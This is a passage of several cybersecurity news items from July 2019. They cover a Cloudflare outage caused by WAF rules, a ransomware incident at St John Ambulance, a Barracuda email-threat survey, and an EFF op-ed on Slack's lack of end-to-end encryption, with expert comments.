“We make software deployments constantly across the network and have automated systems to run test suites and a procedure for deploying progressively to prevent incidents,” wrote Graham-Cumming. “Unfortunately, these WAF rules were deployed globally in one go and caused today’s outage.
“We recognize that an incident like this is very painful for our customers. Our testing processes were insufficient in this case and we are reviewing and making changes to our testing and deployment process to avoid incidents like this in the future.”
A ransomware attack temporarily blocked St John Ambulance staff from accessing its systems, according to its website. At 9am on Tuesday July 2 2019, the attack was detected and was resolved within half an hour.
On its website, St John confirmed that a 'data incident' had taken place and had blocked its employees from accessing the system responsible for booking training courses. However, the organization is "confident" that data has not been shared outside of the company, and that it has informed the Information Commissioner's Office, the Charity Commission and the police of the attack.
Ransomware is a type of malware that gains access to files and systems, blocks access to them (typically by encrypting them) and then demands a ransom to restore access to the organization. It is the same type of malware that was used in the WannaCry attacks on the UK's NHS, which cost the government £92m.
As part of its official FAQ on the attack, St John has confirmed that data such as a person's name, invoicing details and driving license data are among the information compromised by the attack. However, customers who paid by credit card are advised not to worry, as card details are handled by a third party, Barclaycard SmartPay.
“The only data that has been affected relates to our training course delivery,” says the website. “It does not cover supplies, events, ambulance operations, volunteering, volunteer data, employee data, clinical data or patient data.
“We work as hard as we can to protect our data systems from these types of attacks and employ a range of third-party partners and cyber-crime solutions to continually update our protection.”
The attack comes as research on the urgency of addressing cybersecurity risks within the NHS was presented to the House of Lords on Tuesday July 2 2019.
Javvad Malik, security awareness advocate at KnowBe4, commented that St John demonstrated a strong incident response, but that they still need to be vigilant: “It appears as if this ransomware attack is limited to a segregated training system and contains limited data. It's worth noting that SJA has demonstrated strong incident response procedures here with a transparent and timely response notifying the public, police, and the ICO.
“Beyond that, it's unclear how the ransomware infected the systems, but it wouldn't be surprising to hear that the infection arose from a phishing attack,” he continued. “This serves as a reminder that organizations should train their staff on being able to identify a phishing email and not click on malicious links.”
As many as 87% of 280 decision makers have predicted email threats to increase in the coming year, according to a survey by Barracuda Networks.
According to its blog post, many organizations are admitting to being vastly unprepared when it comes to email security, with 94% admitting that “email is still the most vulnerable part of organizations’ security postures.”
“Unsurprisingly, finance departments seem to experience the most attacks, with 57% identifying it as the most targeted department," explained Chris Ross, senior vice-president of international sales at Barracuda. “What was surprising was the rise in customer support attacks; a not insignificant 32% identified this as their most attacked department in what could indicate a new emerging trend for would-be attackers.”
The blog goes on to say that employee training is still not a priority for many, with 29% of respondents receiving such training only once a year. More shockingly, 7% stated they’d either never had training or that they weren’t sure.
“The lack of training is clearly leaving employees either confused or unaware of security protocol, as over half (56%) stated that some employees do not adhere to security policies,” Ross continued. “Of those, 40% said their employees used a ‘workaround’ to do so, perhaps referring to shadow IT solutions and the issues they continue to cause in enterprise IT environments.
“Both of these issues could be solved by regular and in-depth employee security training,” he concluded.
Organizations have also seen cyber-attacks arrive by email. In the last year, according to the survey, 47% were attacked by ransomware, 31% were victims of a business email compromise attack, and a huge 75% admitted to having been hit with brand impersonation. Barracuda also found, in its recent spear phishing report, that 83% of all email attacks were focused on brand impersonation.
However, organizations are starting to take matters into their own hands, with 38% of them increasing their security budgets next year, and over a third (36%) planning to implement instant messaging applications such as Slack or Yammer to reduce email traffic.
“This approach comes with a warning from us,” said Ross. “While we haven’t yet seen attacks using messaging platforms such as Slack, this may well change in the future and doesn’t necessarily mean that these platforms are immune to attacks.
“Any organization going down this route should do so with care, as if we know anything about cyber-attackers, it’s that they’re always trying new ways to catch their victims out.”
Interestingly, these findings come shortly after the publication of an opinion article in the New York Times which highlights Slack's lack of end-to-end encryption, leaving it vulnerable to hackers.
A senior privacy researcher has warned that Slack conversations could be leaked, as well as passwords and usernames, in an opinion article for the New York Times.
In the article, published on Monday, Gennie Gebhart, associate director of research at the Electronic Frontier Foundation, wrote that the business chat app does not have end-to-end encryption even though it “stores everything [a user] does on its platform by default.”
In her op-ed for the New York Times, she wrote: “...which means Slack can read it, law enforcement can request it, and hackers — including the nation-state actors highlighted in Slack’s S-1 — can break in and steal it." According to Slack’s S-1 form, the company has confirmed that it faces threats from “sophisticated organized crime, nation-state, and nation-state supported actors.”
Slack is a business tool which allows people to engage with one another whether they are in the office or not. Using channels to separate conversations and private messaging to enable people to directly communicate with one another, it has been received positively within the workplace in general.
However, Gebhart wrote that while Slack’s paying enterprise customers “do have a way to mitigate their security risk” it's not just them who might be vulnerable to cyber-attacks. She added: “Slack’s users include community organizers, political organizations, journalists and unions. At the Electronic Frontier Foundation, where I work, we collaborate with activists, reporters and others on their digital privacy and security, and we’ve noticed these users increasingly gravitating toward Slack’s free product.”
Slack's free product allows users to search up to 10,000 messages, with older messages retained on Slack's servers. It also enables one-to-one voice and video calls and file sharing. On its website, Slack stated this about its security: “Slack takes privacy and data protection seriously. As a cloud-based company entrusted with some of our customers’ most valuable data, we’ve set high standards for security.
“We’ve received internationally recognized security certifications for ISO 27001 (information security management system) and ISO 27018 (for protecting personal data in the cloud).”
However, Gebhart was concerned that privacy could be breached with the collaboration tool. She said: “Free customer accounts don’t allow for any changes to data retention. Instead, Slack retains all of your messages but makes only the most recent 10,000 visible to you. Everything beyond that 10,000-message limit remains on Slack’s servers. So while those messages might seem out of sight and out of mind, they are all still indefinitely available to Slack, law enforcement and third-party hackers.
“Slack’s business case for keeping your old messages is to have them ready for you just in case you decide to upgrade to the paid product, which has no limit on the number of messages available for you to search and view. But many users — including those most likely to be in the cross-hairs of a law enforcement request or headline-grabbing nation-state hack — are unlikely to ever make that switch.”
Jake Moore, a cybersecurity specialist at ESET, said that while Slack is a “fantastic application” to help people break away from the downsides of email, it might now come with downsides of its own: “Admittedly, many people don’t think or even care about encryption or place it on a priority list when it comes to data or messaging, but in a world where privacy is increasingly becoming more popular, companies need to be thinking about enforcing encryption and privacy for all of their customers by default with no option to bypass it.
“Similarly, companies who don’t use two-factor authentication by default also put their customers’ data at risk of having their confidential data viewed by anyone with the right know-how and tools,” he added.
Ending her opinion article, Gebhart gave her recommendations for what the company should do for its customers: “Slack should give everyone the same privacy protections available to its paying enterprise customers and let all of its users decide for themselves which messages they want to keep and which messages they want to delete.”